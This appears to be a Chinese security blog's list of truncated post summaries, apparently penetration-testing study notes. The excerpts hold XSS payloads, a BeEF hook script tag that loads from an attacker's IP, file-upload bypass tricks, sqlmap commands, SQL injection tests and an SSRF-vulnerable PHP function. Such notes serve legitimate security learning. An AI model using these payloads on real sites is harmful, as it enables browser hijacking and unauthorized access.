摘要:
SSRF(Server-Side Request Forgery:服务器端请求伪造) 漏洞代码及相关函数 <?php function curl($url){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch, 阅读全文
摘要:
绕过方法 去除前端js认证 修改mime-type类型 添加空格绕过 php 修改文件后缀名 php2、php3、phtml 大小写混淆绕过 PhP 点号绕过 php. 特殊符号绕过 php::$DATA 路径绕过 php. . 双写绕过 pphphp %00绕过 php%00(php5.3以下版本 阅读全文
摘要:
Stage #1 payload: <script>alert(document.domain);</script> Stage #2 payload: "><script>alert(document.domain);</script> Stage #3 burp抓包,在p2处输入payload 阅读全文
摘要:
启动beef和apache 修改主页,在网页中添加 <script src='http://IP:3000/hook.js'></script> xss漏洞利用 篡改网页a标签中的连接 <script> window.onload = function(){ var link = document. 阅读全文
摘要:
sqlmap -l 读取proxy中的http请求文件-x 读取http://www.xx.com/?id=1-m 读取文件中多行url-r 读取http请求文件-c 调用配置文件-g google批量扫注--data设定--method 强制使用PUT请求--param-del确定分隔符--coo 阅读全文
摘要:
sql注入验证: \ 'and 1=1and 1=2 sqlmap基本命令 sqlmap -r *.txt -p idsqlmap -u '192.168.1.101/cms/show.php?id=38' --dbssqlmap -u '192.168.1.101/cms/show.php?id= 阅读全文
摘要:
与数据库交互的php代码 $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; 关键的SQL语句 select * from `users` where user = '$user' and pa 阅读全文
摘要:
目标内容 服务器系统、数据库系统、中间件系统、应用程序系统、边界设备等信息,以及系统管理员信息 信息收集分类 主动信息收集:直接与目标交互被动信息收集:通过第三方引擎与目标交互 工具shodan 语法: webcamport:22host:182.61.200.7city:new york port 阅读全文
摘要:
CDN全称Content Delivery Network,我个人理解为是一个缓存服务器,相当于是一个主机服务器的中转站 因为cdn的存在,大部分访问的域名ip都是cdn服务器的ip,并不是真实的主机ip 想要查找到域名的真实ip可以用一些在线查找工具查找ip 阅读全文
摘要:
import requests r = requests.get('http://www.baidu.com') r.headers 阅读全文